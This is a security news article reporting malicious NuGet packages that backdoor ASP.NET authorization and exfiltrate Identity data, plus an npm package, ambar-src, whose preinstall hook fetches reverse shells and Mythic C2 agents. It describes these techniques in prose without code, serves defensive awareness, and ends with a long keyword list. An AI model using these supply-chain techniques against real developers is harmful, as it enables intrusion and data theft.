Four Malicious NuGet Packages Exposed: The Silent Threat Targeting ASP.NET Developers

In a chilling discovery that has sent shockwaves through the developer community, cybersecurity researchers have uncovered a sophisticated malware campaign specifically engineered to compromise ASP.NET web applications. This insidious attack represents a new frontier in software supply chain threats, where malicious actors are no longer content with simply infecting developer machines—they’re targeting the very applications these developers build.

The Discovery That Changed Everything

Socket, a leading software supply chain security company, recently identified four malicious NuGet packages that have collectively amassed over 4,500 downloads before being swiftly removed from the official repository. These packages—NCryptYo, DOMOAuth2, IRAOAuth2.0, and SimpleWriter—were published between August 12 and 21, 2024, by a user named “hamzazaheer.”

What makes this campaign particularly alarming is its surgical precision. Unlike traditional malware that seeks to compromise individual machines, these packages are designed to infiltrate the applications themselves, creating persistent backdoors that remain active even after deployment to production environments.

The Anatomy of a Supply Chain Attack

The attack chain is a masterpiece of malicious engineering, with each package playing a specific role in the broader compromise strategy.

NCryptYo: The Silent Dropper

NCryptYo serves as the campaign’s first-stage dropper, masquerading as a legitimate cryptographic package. Upon loading, its static constructor installs JIT (Just-In-Time) compiler hooks that decrypt embedded payloads and deploy a critical component: a localhost proxy running on port 7152. This proxy acts as a relay station, forwarding traffic between the companion packages and an attacker-controlled command-and-control (C2) server.

The C2 server’s address is dynamically resolved at runtime, making detection and blocking significantly more challenging. This architectural choice demonstrates the attackers’ sophistication and their understanding of modern defensive mechanisms.

DOMOAuth2_ and IRAOAuth2.0: The Data Exfiltrators

These two packages work in tandem to steal ASP.NET Identity data—a treasure trove of information including user accounts, role assignments, and permission mappings. Once the NCryptYo proxy is active, these packages begin transmitting sensitive data through the local proxy to the external C2 infrastructure.

But the attack doesn’t stop at data theft. The C2 server responds with authorization rules that are processed by the application to create persistent backdoors. This could involve granting the attackers admin roles, modifying access controls, or disabling security checks entirely.

SimpleWriter_: The Stealth Execution Engine

SimpleWriter_ presents itself as a PDF conversion utility, but its true capabilities are far more sinister. This package features unconditional file writing and hidden process execution capabilities, allowing the threat actors to write arbitrary content to disk and execute dropped binaries with hidden windows.

The Single Threat Actor Behind the Curtain

Analysis of package metadata has revealed identical build environments across all four packages, indicating that this campaign is the work of a single, sophisticated threat actor. The level of coordination and the specific targeting of ASP.NET Identity data suggests this may be a state-sponsored operation or a highly organized cybercrime group with significant resources.

The Broader Implications

“This campaign’s objective is not to compromise the developer’s machine directly, but to compromise the applications they build,” explained security researcher Kush Pandya. “By controlling the authorization layer during development, the threat actor gains access to deployed production applications.”

This distinction is crucial. Traditional malware might infect a developer’s workstation, but these packages ensure that the compromise persists in the final product. When the victim deploys their ASP.NET application with the malicious dependencies, the C2 infrastructure remains active in production, continuously exfiltrating permission data and accepting modified authorization rules.

The threat actor or their buyers can then grant themselves admin-level access to any deployed instance, effectively owning every application built with these compromised packages.

The NPM Connection: A Parallel Threat Emerges

Just as the NuGet package discovery was making headlines, Tenable disclosed details of a malicious npm package named ambar-src that had amassed over 50,000 downloads before removal. This parallel discovery highlights a broader trend in the software supply chain ecosystem.

Ambar-src, uploaded to npm on February 13, 2026, employs npm’s preinstall script hook to trigger malicious code execution during installation. The malware is designed to run a one-liner command that obtains different payloads from the domain “x-ya[.]ru” based on the operating system:

• Windows: Downloads and executes msinit.exe containing encrypted shellcode
• Linux: Fetches a bash script that retrieves an ELF binary functioning as an SSH-based reverse shell client
• macOS: Executes JavaScript that drops Apfell, a JavaScript for Automation (JXA) agent part of the Mythic C2 framework

The Evasion Techniques

Ambar-src employs multiple techniques to evade detection, including dropping open-source malware with advanced capabilities. The package targets developers across Windows, Linux, and macOS hosts, demonstrating the attackers’ commitment to cross-platform compromise.

Once data is collected, it’s exfiltrated to a Yandex Cloud domain, an effort to blend in with legitimate traffic and take advantage of the fact that trusted services are less likely to be blocked within corporate networks.

The Mythic Connection

Ambar-src is assessed to be a more mature variant of eslint-verify-plugin, another rogue npm package recently flagged by JFrog for dropping Mythic agents Poseidon and Apfell on Linux and macOS systems. This connection suggests a broader ecosystem of supply chain attacks leveraging the Mythic C2 framework.

The Harsh Reality

“If this package is installed or running on a computer, that system must be considered fully compromised,” Tenable stated bluntly. “While the package should be removed, please be aware that because an external entity may have gained full control of the computer, removing the package does not guarantee the elimination of all resulting malicious software.”

This sobering assessment underscores the severity of these supply chain attacks. The compromise extends far beyond the initial package installation, potentially affecting every application built with the compromised dependencies.

The Path Forward

These discoveries serve as a wake-up call for the entire software development community. The traditional approach of trusting package repositories is no longer sufficient. Developers must implement comprehensive supply chain security measures, including:

• Rigorous package vetting and dependency scanning
• Runtime monitoring for unusual behavior
• Regular security audits of development environments
• Zero-trust principles applied to software dependencies

The sophistication of these attacks demonstrates that malicious actors are investing significant resources in targeting the software supply chain. As applications become increasingly critical to business operations and daily life, these attacks will only become more prevalent and more dangerous.

The battle for software supply chain security has entered a new phase, and developers, security researchers, and platform providers must adapt quickly to protect the integrity of the applications we all depend on.

Tags: NuGet malware, ASP.NET security, software supply chain attack, NCryptYo, DOMOAuth2, IRAOAuth2.0, SimpleWriter, Socket security, Tenable research, npm malicious package, ambar-src, Mythic C2 framework, JIT hooking, credential theft, backdoor installation, cybersecurity threat, developer targeting, package repository compromise, C2 infrastructure, cross-platform malware, supply chain security, software development security, malicious dependencies, runtime compromise, production environment threat, authorization manipulation, data exfiltration, hidden process execution, static constructor malware, build environment analysis, threat actor sophistication, Yandex Cloud exfiltration, SSH reverse shell, JavaScript for Automation, JXA agent, Poseidon malware, Apfell framework, eslint-verify-plugin, zero-trust security, dependency scanning, runtime monitoring, security audit, software integrity, critical infrastructure protection, advanced persistent threat, state-sponsored cybercrime, organized cybercrime, malicious package detection, package repository security, developer workstation compromise, application-level compromise, production deployment threat, permission data theft, access control modification, security check bypass, cross-platform targeting, Windows malware, Linux malware, macOS malware, encrypted shellcode, ELF binary malware, bash script execution, JavaScript malware, open-source malware ecosystem, supply chain attack evolution, defensive mechanism bypass, dynamic C2 resolution, localhost proxy attack, JIT compiler hooking, embedded payload decryption, stage-1 dropper, stage-2 binary deployment, persistent backdoor creation, admin role escalation, malicious PDF conversion, unconditional file writing, hidden window execution, metadata analysis, single threat actor campaign, surgical precision targeting, application compromise persistence, C2 infrastructure continuity, permission mapping theft, role assignment compromise, user account exfiltration, authorization rule manipulation, security control disablement, Mythic framework exploitation, JFrog security research, package removal limitations, full system compromise, malicious software elimination, supply chain security evolution, software dependency trust, runtime behavior monitoring, development environment security, application integrity protection, daily life software dependence, attack prevalence increase, danger escalation, rapid adaptation requirement, integrity protection necessity.

,